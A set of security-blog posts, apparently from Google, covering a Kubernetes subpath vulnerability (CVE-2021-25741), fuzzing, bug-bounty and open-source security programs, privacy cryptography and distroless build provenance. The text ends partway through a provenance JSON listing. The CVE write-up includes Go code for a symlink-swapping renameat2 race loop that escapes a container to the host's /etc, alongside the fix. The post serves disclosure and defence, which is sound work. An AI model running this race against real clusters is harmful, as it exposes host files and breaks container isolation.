
Exploring Container Security: A Storage Vulnerability Deep Dive



Kubernetes security is constantly evolving, keeping pace with enhanced functionality, usability, and flexibility while also balancing the security needs of a wide and diverse set of use cases.

Recently, the GKE Security team discovered a high severity vulnerability that allowed workloads to have access to parts of the host filesystem outside the mounted volumes boundaries. Although the vulnerability was patched back in September we thought it would be beneficial to write up a more in-depth analysis of the issue to share with the community.

We assessed the impact of the vulnerability as described in vulnerability management in open-source Kubernetes and worked closely with the GKE Storage team and the Kubernetes Security Response Committee to find a fix. In this post we’ll give some background on how the subpath storage system works, an overview of the vulnerability, the steps to find the root cause and the fix, and finally some recommendations for GKE and Anthos users.


Kubernetes Filesystems: Intro to Volume Subpath
The vulnerability, CVE-2021-25741, was caused by a race condition during the creation of a subpath bind mount inside a container, and allowed an attacker to gain unauthorized access to the underlying node filesystem and its sensitive files. We’ll describe how that system is supposed to work, and then talk about the vulnerability.

The volume subpath feature in Kubernetes enables sharing a volume in multiple containers inside a pod. For example, we could create a Pod with an InitContainer that creates directories with pre-populated data in a mounted filesystem volume. These directories can then be used by containers in the same Pod by mounting the same volume and optionally specifying a subpath field to limit what's visible inside the container.
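To make this concrete, here is a minimal sketch of such a Pod, written with the Go API types from k8s.io/api (this is our illustration, not an example from the Kubernetes docs; the image, volume, and directory names are assumptions):

package main

import (
	"encoding/json"
	"fmt"

	corev1 "k8s.io/api/core/v1"
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)

func main() {
	pod := &corev1.Pod{
		ObjectMeta: metav1.ObjectMeta{Name: "subpath-demo"},
		Spec: corev1.PodSpec{
			// One shared emptyDir volume used by both containers.
			Volumes: []corev1.Volume{{
				Name:         "shared",
				VolumeSource: corev1.VolumeSource{EmptyDir: &corev1.EmptyDirVolumeSource{}},
			}},
			// The init container pre-populates a subdirectory of the volume.
			InitContainers: []corev1.Container{{
				Name:         "prepare",
				Image:        "busybox",
				Command:      []string{"sh", "-c", "mkdir -p /work/app1 && echo seed > /work/app1/data.txt"},
				VolumeMounts: []corev1.VolumeMount{{Name: "shared", MountPath: "/work"}},
			}},
			// The app container mounts the same volume, but only sees the
			// app1 subdirectory thanks to the SubPath field.
			Containers: []corev1.Container{{
				Name:         "app",
				Image:        "busybox",
				Command:      []string{"sleep", "3600"},
				VolumeMounts: []corev1.VolumeMount{{Name: "shared", MountPath: "/data", SubPath: "app1"}},
			}},
		},
	}
	out, _ := json.MarshalIndent(pod, "", "  ")
	fmt.Println(string(out))
}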

While there are some great use cases for this feature, it’s an area that has had vulnerabilities discovered in the past. The kubelet must be extra cautious when handling user-owned subpaths because it operates with privileges in the host. One vulnerability that has been previously discovered involved the creation of a malicious workload where an InitContainer would create a symlink pointing to any location in the host. For example, the InitContainer could mount a volume in /mnt and create a symlink /mnt/attack inside the container pointing to /etc. Later in the Pod lifecycle, another container would attempt to mount the same volume with subpath attack. While preparing the volumes for the container, the kubelet would end up following the symlink to the host’s /etc instead of the container’s /etc, unknowingly exposing the host filesystem to the container. A previous fix made sure that the subpath mount location is resolved and validated to point to a location inside the base volume and that it's not changeable by the user in between the time the path was validated and when the container runtime bind mounts it. This race condition is known as time of check to time of use (TOCTOU) where the subject being validated changes after it has been validated.

These validations and others are summarized in the following container lifecycle sequence diagram.




Volume subpath validations before the container startup

A New TOCTOU Vulnerability: CVE-2021-25741
The latest vulnerability was discovered by performing a symlink attack similar to the one explained above, with the difference being that the exploit constantly swapped the symlink with a directory in a tight loop, using the RENAME_EXCHANGE option of renameat2(2). If the timing is just right, the kubelet will see the path as a directory and pass the validation check. Then the mount utility may find that the path is a symlink pointing to the host and follow it, exposing the host filesystem to the container. This is visualized in the following diagram:


The expectation and the attack outcome
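A rough sketch of that racing primitive, in Go, looks like the program below. This is our illustration of the technique described above, not the researchers' actual exploit, and the /mnt paths are assumptions; it would run inside the attacker's container against the mounted volume:

package main

import (
	"log"
	"os"

	"golang.org/x/sys/unix"
)

func main() {
	// "attack" is the name later requested as the subPath; "swap" is a
	// symlink escaping to the host's /etc.
	if err := os.MkdirAll("/mnt/attack", 0o755); err != nil {
		log.Fatal(err)
	}
	_ = os.Remove("/mnt/swap")
	if err := os.Symlink("/etc", "/mnt/swap"); err != nil {
		log.Fatal(err)
	}

	// Tight loop: RENAME_EXCHANGE atomically swaps the two paths, so at any
	// instant /mnt/attack is either a real directory (which passes the
	// kubelet's validation) or a symlink to /etc (which mount may follow).
	for {
		if err := unix.Renameat2(unix.AT_FDCWD, "/mnt/attack",
			unix.AT_FDCWD, "/mnt/swap", unix.RENAME_EXCHANGE); err != nil {
			log.Fatal(err)
		}
	}
}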

The GKE Security and Storage teams worked closely to revisit the previous fix and find a solution. The previous fix takes several steps to ensure that the directory being mounted is safely opened and validated. After the file is opened and validated, the kubelet uses the magic-link path under the /proc/[pid]/fd directory for all subsequent operations to ensure the file remains unchanged. However, we found that all of these efforts were undone by the mount(8) Linux utility, which was dereferencing the procfs magic-link by default. Once the problem was understood, the fix involved making sure that the mount utility doesn't dereference the magic-links by using the --no-canonicalize flag in the mount command.
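As a hedged sketch of the idea behind the fix (not the kubelet's actual implementation), the safe pattern is to hold a file descriptor to the validated path and hand mount(8) only the /proc magic-link, passing --no-canonicalize so the utility doesn't resolve it back into a (possibly attacker-controlled) pathname. Paths here are illustrative:

package main

import (
	"fmt"
	"log"
	"os/exec"

	"golang.org/x/sys/unix"
)

func bindMountSubpath(validatedPath, target string) error {
	// O_PATH|O_NOFOLLOW: obtain a handle to the path itself and fail if the
	// final component is a symlink. After this point the attacker can keep
	// swapping the path on disk, but our fd still refers to what we validated.
	fd, err := unix.Open(validatedPath, unix.O_PATH|unix.O_NOFOLLOW, 0)
	if err != nil {
		return err
	}
	defer unix.Close(fd)

	src := fmt.Sprintf("/proc/self/fd/%d", fd)
	// --no-canonicalize keeps mount(8) from dereferencing the magic-link.
	out, err := exec.Command("mount", "--bind", "--no-canonicalize", src, target).CombinedOutput()
	if err != nil {
		return fmt.Errorf("mount failed: %v: %s", err, out)
	}
	return nil
}

func main() {
	if err := bindMountSubpath("/var/lib/kubelet/volume/subpath", "/target"); err != nil {
		log.Fatal(err)
	}
}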

The fix is in

Once the problem was well understood, we fixed it inside Kubernetes and quickly released the fix to GKE and Anthos. If GKE auto-upgrade is enabled in your clusters, there's no action needed on your part for this vulnerability; your nodes have already been patched. We strongly recommend that customers use auto-upgrade, which gives peace of mind that your clusters are running with the latest patches.

GKE released a Google Kubernetes Engine security bulletin on this vulnerability, which detailed what customers can do to immediately remediate this issue across GKE and Anthos. We also provided guidance to customers who manually manage their node versions, ensuring that fixed releases were available in every region for our Static and Release Channels.

Moving forward
Google continues to invest heavily in the security of GKE and Kubernetes. We encourage users interested in finding vulnerabilities to participate in the Kubernetes bug bounty program and in the Google Vulnerability Rewards Program (VRP) which was recently expanded to cover GKE vulnerabilities. For the latest guidance on security issues, please follow our GKE Security Bulletins.

ClusterFuzzLite: Continuous fuzzing for all



In recent years, continuous fuzzing has become an essential part of the software development lifecycle. By feeding unexpected or random data into a program, fuzzing catches bugs that would otherwise slip through the most thorough manual checks and provides coverage that would take staggering human effort to replicate. NIST’s guidelines for software verification, recently released in response to the White House Executive Order on Improving the Nation’s Cybersecurity, specify fuzzing among the minimum standard requirements for code verification.
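For readers unfamiliar with what a fuzz target looks like in practice, here is a minimal, illustrative go-fuzz/OSS-Fuzz-style target in Go (the package name and the parser it exercises are stand-ins, not from any real project): the fuzzing engine calls Fuzz over and over with mutated inputs and reports any panics or sanitizer findings.

package parser

import "bytes"

// parseRecord is a toy stand-in for the code under test: it splits "key=value".
func parseRecord(data []byte) (key, value []byte, ok bool) {
	i := bytes.IndexByte(data, '=')
	if i < 0 {
		return nil, nil, false
	}
	return data[:i], data[i+1:], true
}

// Fuzz is the entry point the fuzzing engine drives; returning 1 hints that
// the input was "interesting" and worth keeping in the corpus.
func Fuzz(data []byte) int {
	if _, _, ok := parseRecord(data); ok {
		return 1
	}
	return 0
}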

Today, we are excited to announce ClusterFuzzLite, a continuous fuzzing solution that runs as part of CI/CD workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed, enhancing the overall security of the software supply chain.

Since its release in 2016, Google’s OSS-Fuzz program has integrated over 500 critical open source projects, resulting in over 6,500 vulnerabilities and 21,000 functional bugs being fixed. ClusterFuzzLite goes hand-in-hand with OSS-Fuzz by catching regression bugs much earlier in the development process.

Large projects including systemd and curl are already using ClusterFuzzLite during code review, with positive results. According to Daniel Stenberg, author of curl, “When the human reviewers nod and have approved the code and your static code analyzers and linters can't detect any more issues, fuzzing is what takes you to the next level of code maturity and robustness. OSS-Fuzz and ClusterFuzzLite help us maintain curl as a quality project, around the clock, every day and every commit.”

With the release of ClusterFuzzLite, any project can integrate this essential testing standard and benefit from fuzzing. ClusterFuzzLite offers many of the same features as ClusterFuzz, such as continuous fuzzing, sanitizer support, corpus management, and coverage report generation. Most importantly, it’s easy to set up and works with closed source projects, making ClusterFuzzLite a convenient option for any developer who wants to fuzz their software.



 


With ClusterFuzzLite, fuzzing is no longer just an idealized "bonus" round of testing for those who have access to it, but a critical must-have step that everyone can use continuously on every software project. By finding and preventing bugs before they enter the codebase we can build a more secure software ecosystem.

To learn more, check out the ClusterFuzzLite documentation. ClusterFuzzLite currently supports GitHub Actions, Google Cloud Build, and Prow. We built this with CI system extensibility in mind, and adding support for other CI systems is straightforward. Please contact us if you’re interested in contributing support, or have any questions, feedback or feature requests.

Trick & Treat! 🎃 Paying Leets and Sweets for Linux Kernel privescs and k8s escapes


Starting today and for the next 3 months (until January 31, 2022), we will pay 31,337 USD to security researchers who exploit privilege escalation in our lab environment using a patched vulnerability, and 50,337 USD to those who use a previously unpatched vulnerability or a new exploit technique.

We are constantly investing in the security of the Linux kernel because much of the internet, and Google itself, from the devices in our pockets to the services running on Kubernetes in the cloud, depends on its security. We research its vulnerabilities and attacks, as well as study and develop its defenses.

But we know that there is more work to do. That’s why we have decided to build on top of our kCTF VRP from last year and triple our previous reward amounts (for at least the next 3 months).

Our base reward for each publicly patched vulnerability is 31,337 USD (at most one exploit per vulnerability), but the reward can go up to 50,337 USD in two cases:
  • If the vulnerability was otherwise unpatched in the Kernel (0day)
  • If the exploit uses a new attack or technique, as determined by Google
We hope the new rewards will encourage the security community to explore new kernel exploitation techniques to achieve privilege escalation and drive quicker fixes for these vulnerabilities. It is important to note that the easiest exploitation primitives are not available in our lab environment due to the hardening done on Container-Optimized OS. Note that this program complements Android's VRP rewards, so exploits that work on Android could also be eligible for up to 250,000 USD (that's in addition to this program).

The mechanics are:
  1. Connect to the kCTF VRP cluster, obtain root and read the flag (read this writeup for how it was done before, and this threat model for inspiration), and then submit your flag and a checksum of your exploit in this form.
  2. (If applicable) report vulnerabilities to upstream.
    • We strongly recommend including a patch since that could qualify for an additional reward from our Patch Reward Program, but please report vulnerabilities upstream promptly once you confirm they are exploitable.
  3. Report your finding to Google VRP once all patches are publicly available (we don't want to receive details of unpatched vulnerabilities ahead of the public).
    • Provide the exploit code and the algorithm used to calculate the hash checksum.
    • A rough description of the exploit strategy is welcome.
Reports will be triaged on a weekly basis. If you have problems with the lab environment (it's unavailable, you hit technical issues, or you have other questions), contact us on Discord in #kctf. You can read more details about the program here. Happy hunting!

Protecting your device information with Private Set Membership


At Google, keeping you safe online is our top priority, so we continuously build the most advanced privacy-preserving technologies into our products. Over the past few years, we've utilized innovations in cryptographic research to keep your personal information private by design and secure by default. As part of this, we launched Password Checkup, which protects account credentials by notifying you if an entered username and password are known to have been compromised in a prior data breach. Using cryptographic techniques, Password Checkup can do this without revealing your credentials to anyone, including Google. Today, Password Checkup protects users across many platforms including Android, Chrome and Google Password Manager.

Another example is Private Join and Compute, an open source protocol which enables organizations to work together and draw insights from confidential data sets. Two parties are able to encrypt their data sets, join them, and compute statistics over the joint data. By leveraging secure multi-party computation, Private Join and Compute is designed to ensure that the plaintext data sets are concealed from all parties.

In this post, we introduce the next iteration of our research, Private Set Membership, as well as its open-source availability. At a high level, Private Set Membership considers the scenario in which Google holds a database of items, and user devices need to contact Google to check whether a specific item is found in the database. As an example, users may want to check membership of a computer program on a block list consisting of known malicious software before executing the program. Often, the set’s contents and the queried items are sensitive, so we designed Private Set Membership to perform this task while preserving the privacy of our users.

Protecting your device information during enrollment
Beginning in Chrome 94, Private Set Membership will enable Chrome OS devices to complete the enrollment process in a privacy-preserving manner. Device enrollment is an integral part of the out-of-box experience that welcomes you when getting started with a Chrome OS device.

The device enrollment process requires checking membership of device information in encrypted Google databases, including checking if a device is enterprise enrolled or determining if a device was pre-packaged with a license. The correct end state of your Chrome OS device is determined using the results of these membership checks.

During the enrollment process, Private Set Membership protects your Chrome OS device by ensuring that no information ever leaves the device in a form that could be decrypted by anyone else. Google will never learn any device information, and devices will not learn any unnecessary information about other devices. To our knowledge, this is the first instance of advanced cryptographic tools being leveraged to protect device information during the enrollment process.

A deeper look at Private Set Membership
Private Set Membership is built upon two cryptographic tools:
  • Homomorphic encryption is a powerful cryptographic tool that enables computation over encrypted data without the need for decryption. As an example, given the encryptions of values X and Y, homomorphic encryption enables computing the encryption of the sum of X and Y without ever needing to decrypt. This preserves privacy as the data remains concealed during the computation. Private Set Membership is built upon Google’s open source homomorphic encryption library.
  • Oblivious hashing is a cryptographic technique that enables two parties to jointly compute a hash, H(K, x), where the sender holds the key, K, and the receiver holds the hash input, x. The receiver will obtain the hash, H(K, x), without learning the key K. At the same time, the input x will be hidden from the sender.
Take a look at how Private Set Membership utilizes homomorphic encryption and oblivious hashing to protect data below:
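As a rough schematic in our own notation (not the protocol's formal definition), the two building blocks combine as follows:

\[ E(x) \oplus E(y) = E(x + y) \qquad \text{(homomorphic addition over ciphertexts)} \]

\[ (\text{sender holds } K),\ (\text{receiver holds } x) \;\longrightarrow\; \text{receiver learns only } H(K, x),\ \text{sender learns nothing about } x \]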



For a deeper look into the technology behind Private Set Membership, you can also access our open source code.

Privacy properties
By using Private Set Membership, the following privacy properties are obtained:
  • No data leaves the device when checking membership. We designed Private Set Membership using advanced cryptographic techniques to ensure that data never leaves the device in an unencrypted manner when performing membership checks. As a result, the data on your device will be concealed from everyone, including Google.
  • Devices learn only membership information and nothing else. Private Set Membership was designed to prevent devices from learning any unnecessary information about other devices when querying. For each query, devices learn only the results of the membership check and no other information.
Using Private Set Membership to solve more problems
Private Set Membership is a powerful tool that solves a fundamental problem in a privacy-preserving manner. This is just the beginning of what’s possible using this technology. Private Set Membership can help preserve user privacy across a wide array of applications. For example:
  • Checking allow or block lists. In this setting, users check membership in an allow or block list to determine whether to proceed with the desired action. Private Set Membership enables this check without any information about the software leaving the device.
  • Control flows with conditional membership checks. Control flows are a common computer science concept that represent arbitrary computer programs with conditional branching. In many cases, the conditional branches require checking membership of sensitive data to determine the next step of the algorithm. By utilizing Private Set Membership, we enable execution of these algorithms while ensuring data never leaves the user’s device.
We still have a ways to go before Private Set Membership is used for general membership checks by devices. At Google, we are exploring a number of potential use cases to protect your privacy using Private Set Membership. We are excited to continue advancing the state-of-the-art cryptographic research to keep you safe.

Acknowledgements


The work in this post is the result of a collaboration between a large group of current and former Google engineers, research scientists and others including: Amr Aboelkher, Asra Ali, Ghous Amjad, Yves Arrouye, Roland Bock, Xi Chen, Maksim Ivanov, Dennis Kalinichenko, Nirdhar Khazanie, Dawon Lee, Tancrède Lepoint, Lawrence Lui, Pavol Marko, Thiemo Nagel, Mariana Raykova, Aaron Segal, Joon Young Seo, Karn Seth, and Jason Wong.

Launching a collaborative minimum security baseline


According to an Opus and Ponemon Institute study, 59% of companies have experienced a data breach caused by one of their vendors or third parties. Outsourcing operations to third-party vendors has become a popular business strategy as it allows organizations to save money and increase operational efficiency. While these are positives for business operations, they do create significant security risks. These vendors have access to critical systems and customer data, so their security posture becomes equally important.

Up until today, organizations of all sizes have had to design and implement their own security baselines for vendors that align with their risk posture. Unfortunately, this creates an impossible situation for vendors and organizations alike as they try to accommodate thousands of different requirements.

To solve this challenge, organizations across the industry teamed up to design Minimum Viable Secure Product or MVSP – a vendor-neutral security baseline that is designed to eliminate overhead, complexity and confusion during the procurement, RFP and vendor security assessment process by establishing minimum acceptable security baselines. With MVSP, the industry can increase clarity during each phase so parties on both sides of the equation can achieve their goals, and reduce the onboarding and sales cycle by weeks or even months.

MVSP was developed and is backed by companies across the industry, including Google, Salesforce, Okta, Slack and more. Our goal is to increase the minimum bar for security across the industry while simplifying the vetting process.

MVSP is a collaborative baseline focused on developing a set of minimum security requirements for business-to-business software and business process outsourcing suppliers. Designed with simplicity in mind, it contains only those controls that must, at a minimum, be implemented to ensure a reasonable security posture. MVSP is presented in the form of a minimum baseline checklist that can be used to verify the security posture of a solution.

How can MVSP help you?





Security teams measuring vendor offerings against a set of minimum security baselines

MVSP ensures that vendor selection and RFP include a minimum baseline that is backed by the industry. Communicating minimum requirements up front ensures everyone understands where they stand and that the expectations are clear.

Internal teams looking to measure your security against minimum requirements

MVSP provides a set of minimum security baselines that can be used as a checklist to understand gaps in the security of a product or service. This can be used to highlight opportunities for improvement and raise their visibility within the organization, with clearly defined benefits.


Procurement teams gathering information about vendor services

MVSP provides a single set of security-relevant questions that are publicly available and industry-backed. Aligning on a single set of baselines allows clearer understanding from vendors, resulting in a quicker and more accurate response.

Legal teams negotiating contractual controls

MVSP ensures expectations regarding minimum security controls are understood up front, reducing discussions of controls at the contract negotiation stage. Referencing an external baseline helps to simplify contract language and increases familiarity with the requirements.

Compliance teams documenting processes

MVSP provides an externally recognized and adopted set of security baselines on top of which to build your compliance efforts.

We welcome community feedback and interest from other organizations who want to contribute to the MVSP baseline. Together we can raise the minimum bar for security across the industry and make everyone safer.

Acknowledgements

The work in this post is the result of a collaboration between a large number of security practitioners across the industry including: Marat Vyshegorodtsev, Chris John Riley, Gabor Acs-Kurucz, Sebastian Oglaza, Gen Buckley, and Kevin Clark.

Google Protects Your Accounts – Even When You No Longer Use Them





What happens to our digital accounts when we stop using them? It’s a question we should all ask ourselves, because when we are no longer keeping tabs on what’s happening with old accounts, they can become targets for cybercrime.

In fact, quite a few recent high-profile breaches targeted inactive accounts. The Colonial Pipeline ransomware attack came through an inactive account that didn’t use multifactor authentication, according to a consultant who investigated the incident. And in the case of the recent T-Mobile breach this summer, information from inactive prepaid accounts was accessed through old billing files. Inactive accounts can pose a serious security risk.

For Google users, Inactive Account Manager helps with that problem. You can decide when Google should consider your account inactive and whether Google should delete your data or share it with a trusted contact.

Here’s How it Works

Once you sign up for Inactive Account Manager, available in My Account settings, you are asked to decide three things:
  1. When the account should be considered inactive: You can choose 3, 6, 12 or 18 months of inactivity before Google takes action on your account. Google will notify you a month before the designated time via a message sent to your phone and an email sent to the address you provide.
  2. Who to notify and what to share: You can choose up to 10 people for Google to notify once your Google Account becomes inactive (they won’t be notified during setup). You can also give them access to some of your data. If you choose to share data with your trusted contacts, the email will include a list of the selected data you wanted to share with them, and a link they can follow to download that data. This can include things like photos, contacts, emails, documents and other data that you specifically choose to share with your trusted contact. You can also choose to set up a Gmail AutoReply, with a custom subject and message explaining that you’ve ceased using the account.
  3. If your inactive Google Account should be deleted: After your account becomes inactive, Google can delete all its content or send it to your designated contacts. If you’ve decided to allow someone to download your content, they’ll be able to do so for 3 months before it gets deleted. If you choose to delete your Google Account, this will include your publicly shared data (for example, your YouTube videos, or blogs on Blogger). You can review the data associated with your account on the Google Dashboard. If you use Gmail with your account, you'll no longer be able to access that email once your account becomes inactive. You'll also be unable to reuse that Gmail username.
Setting up an Inactive Account plan is a simple step you can take to protect your data, secure your account in case it becomes inactive, and ensure that your digital legacy is shared with your trusted contacts in case you become unable to access your account. Our Privacy Checkup now reminds you to set up a plan for your account, and we’ll send you an occasional reminder about your plan via email.

At Google, we are constantly working to keep you safer online. This October, as we celebrate Cybersecurity Awareness Month, we want to remind our users of the security and privacy controls they have at their fingertips. For more ways to enhance your security check out our top five safety tips and visit our Safety Center to learn all the ways Google helps keep you safer online, every day.

Introducing the Secure Open Source Pilot Program


Over the past year we have made a number of investments to strengthen the security of critical open source projects, and recently announced our $10 billion commitment to cybersecurity defense including $100 million to support third-party foundations that manage open source security priorities and help fix vulnerabilities.

Today, we are excited to announce our sponsorship for the Secure Open Source (SOS) pilot program run by the Linux Foundation. This program financially rewards developers for enhancing the security of critical open source projects that we all depend on. We are starting with a $1 million investment and plan to expand the scope of the program based on community feedback.


Why SOS?

SOS rewards a very broad range of improvements that proactively harden critical open source projects and supporting infrastructure against application and supply chain attacks. To complement existing programs that reward vulnerability management, SOS’s scope is comparatively wider in the type of work it rewards, in order to support project developers.


What projects are in scope?

Since there is no one definition of what makes an open source project critical, our selection process will be holistic. During submission evaluation we will consider the guidelines established by the National Institute of Standards and Technology in response to the recent Executive Order on Cybersecurity, along with the criteria listed below:
  • The impact of the project:
    • How many and what types of users will be affected by the security improvements?
    • Will the improvements have a significant impact on infrastructure and user security?
    • If the project were compromised, how serious or wide-reaching would the implications be?
  • The project’s rankings in existing open source criticality research.

What security improvements qualify? 

The program is initially focused on rewarding the following work:

  • Software supply chain security improvements including hardening CI/CD pipelines and distribution infrastructure. The SLSA framework suggests specific requirements to consider, such as basic provenance generation and verification.
  • Adoption of software artifact signing and verification. One option to consider is Sigstore's set of utilities (e.g. cosign).
  • Project improvements that produce higher OpenSSF Scorecard results. For example, a contributor can follow remediation suggestions for the following Scorecard checks:
    • Code-Review
    • Branch-Protection
    • Pinned-Dependencies
    • Dependency-Update-Tool
    • Fuzzing
  • Use of OpenSSF Allstar and remediation of discovered issues.
  • Earning a CII Best Practice Badge (which also improves the Scorecard results).
We'll continue adding to the above list, so check our FAQ for updates. You may also submit improvements not listed above, if you provide justification and evidence to help us understand the complexity and impact of the work.

Only work completed after October 1, 2021 qualifies for SOS rewards.

Upfront funding is available on a limited case by case basis for impactful improvements of moderate to high complexity over a longer time span. Such requests should explain why funding is required upfront and provide a detailed plan of how the improvements will be landed.

How to participate

Review our FAQ and fill out this form to submit your application.

Please include as much data or supporting evidence as possible to help us evaluate the significance of the project and your improvements. 


Reward amounts

Reward amounts are determined based on complexity and impact of work:
  • $10,000 or more for complicated, high-impact and lasting improvements that almost certainly prevent major vulnerabilities in the affected code or supporting infrastructure.
  • $5,000-$10,000 for moderately complex improvements that offer compelling security benefits.
  • $1,000-$5,000 for submissions of modest complexity and impact.
  • $505 for small improvements that nevertheless have merit from a security standpoint.

Looking Ahead

The SOS program is part of a broader effort to address a growing truth: the world relies on open source software, but widespread support and financial contributions are necessary to keep that software safe and secure. This $1 million investment is just the beginning—we envision the SOS pilot program as the starting point for future efforts that will hopefully bring together other large organizations and turn it into a sustainable, long-term initiative under the OpenSSF. We welcome community feedback and interest from others who want to contribute to the SOS program. Together we can pool our support to give back to the open source community that makes the modern internet possible.

Announcing New Patch Reward Program for Tsunami Security Scanner


One year ago, we published the Tsunami security scanner with the goal of detecting high severity, actively exploited vulnerabilities with high confidence. In the last several months, the Tsunami scanner team has been working closely with our vulnerability rewards program, Bug Hunters, to further improve Tsunami's security detection capabilities.

Today, we are announcing a new experimental Patch Reward Program for the Tsunami project. Participants in the program will receive patch rewards for providing novel Tsunami detection plugins and web application fingerprints. We hope this program will allow us to quickly extend the detection capabilities of the scanner to better benefit our users and uncover more vulnerabilities in their network infrastructure.

For this launch, we will accept two types of contributions:
  • Vulnerability detection plugins: In order to expand the Tsunami scanner's detection capabilities, we encourage everyone who is interested in making contributions to this project to add new vulnerability detection plugins. All plugin contributions will be reviewed by our panel members in Google's Vulnerability Management team, and the reward amount will be determined by the severity as well as the time sensitivity of the vulnerability.
  • Web application fingerprints: Several months ago, we added new web application fingerprinting capabilities to Tsunami that detect popular off-the-shelf web applications. It achieves this goal by matching application fingerprints against a database of known web application fingerprints. More fingerprint data is needed for this approach to support more web applications. You will be rewarded with a flat amount for each application added to the database.

As with other Security Reward Programs, rewards can be donated to charity—and we'll double your donation if you choose to do so. We'll run this program in iterations so that everyone interested has the opportunity to participate.

To learn more about this program, please check out our official rules and guidelines. And if you have any questions or suggestions for the program, feel free to contact us at [email protected].

Distroless Builds Are Now SLSA 2

A few months ago we announced that we started signing all distroless images with cosign, which allows users to verify that they have the correct image before starting the build process. Signing our images was our first step towards fully securing the distroless supply chain. Since then, we’ve implemented even more accountability in our supply chain and are excited to announce that distroless builds have achieved SLSA 2. SLSA is a security framework for increasing supply chain security, and Level 2 ensures that the build service is tamper resistant.


This means that in addition to a signature, each distroless image now has an associated signed provenance. This provenance is an in-toto attestation and includes information around how each image was built, what command was run, and what build system was used. It also includes any special parameters that were passed in, the exact commit the images were built at, and more. This provenance is a useful tool for builds that need to be audited in the future.

How the distroless build meets each SLSA 2 requirement:
  • Source - Version controlled: Source code in GitHub
  • Build - Scripted build: Build script exists as a Tekton Pipeline, invoked as a Google Cloud Build step
  • Build - Build service: All steps run on Kubernetes with Tekton
  • Provenance - Available: Provenance is available in the rekor transparency log as an in-toto attestation
  • Provenance - Authenticated: Provenance is signed with the distroless GCP KMS key
  • Provenance - Service generated: Provenance is generated by Tekton Chains from a Tekton TaskRun



Achieving SLSA 2 required some changes to the distroless build pipeline: we set up Tekton Pipelines and Tekton Chains in a GKE cluster to automate building images and generating provenance. Every time a pull request is merged to the distroless GitHub repo, a Tekton Pipeline is triggered. This Pipeline builds the distroless images, and Tekton Chains is responsible for generating signed provenance for each image. Tekton Chains stores the signed provenance alongside the image in an OCI registry and also stores a record of the provenance in the rekor transparency log.

Don't trust us?


You can try the build yourself. Because distroless builds are reproducible, all the information to replicate the build is in the provenance, and you or a trusted third party can build the image yourself and verify that the build is correct by matching image digests.


You can verify an attestation for a distroless image with cosign and the distroless public key:

$ cosign verify-attestation -key cosign.pub gcr.io/distroless/base@sha256:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91


Verification for gcr.io/distroless/base@sha256:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91 --

The following checks were performed on each of these signatures:

  - The cosign claims were validated

  - The signatures were verified against the specified public key

  - Any certificates were verified against the Fulcio roots.


...


And you can find the provenance for the image in the rekor transparency log with the rekor-cli tool. For example, you could find the provenance for the above image by using the image’s digest and running:

$ rekor-cli search --sha sha256:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91


af7a9687d263504ccdb2759169c9903d8760775045c6e7554e365ec2bf29f6f8


$ rekor-cli get --uuid af7a9687d263504ccdb2759169c9903d8760775045c6e7554e365ec2bf29f6f8 --format json | jq -r .Attestation | base64 --decode | jq


{

  "_type": "distroless-provenance",

  "predicateType": "https://tekton.dev/chains/provenance",

  "subject": [

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "703a4726aedc9ec7a7e32251087565246db117bb9a141a7993d1c4bb4036660d"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "d322ed16d530596c37eee3eb57a039677502aa71f0e4739b0272b1ebd8be9bce"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "2dfdd5bf591d0da3f67a25f3fc96d929b256d5be3e0af084db10952e5da2c661"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "dc0a793d83196a239abf3ba035b3d1a0c7a24184856c2649666e84bc82fc5980"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "2dfdd5bf591d0da3f67a25f3fc96d929b256d5be3e0af084db10952e5da2c661"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "703a4726aedc9ec7a7e32251087565246db117bb9a141a7993d1c4bb4036660d"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "d322ed16d530596c37eee3eb57a039677502aa71f0e4739b0272b1ebd8be9bce"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "dc0a793d83196a239abf3ba035b3d1a0c7a24184856c2649666e84bc82fc5980"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian11",

      "digest": {

        "sha256": "c9507268813f235b11e63a7ae01526b180c94858bd718d6b4746c9c0e8425f7a"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "4af613acf571a1b86b1d3c50682caada0b82024e566c1c4c2fe485a70f3af47d"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "4af613acf571a1b86b1d3c50682caada0b82024e566c1c4c2fe485a70f3af47d"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/java",

      "digest": {

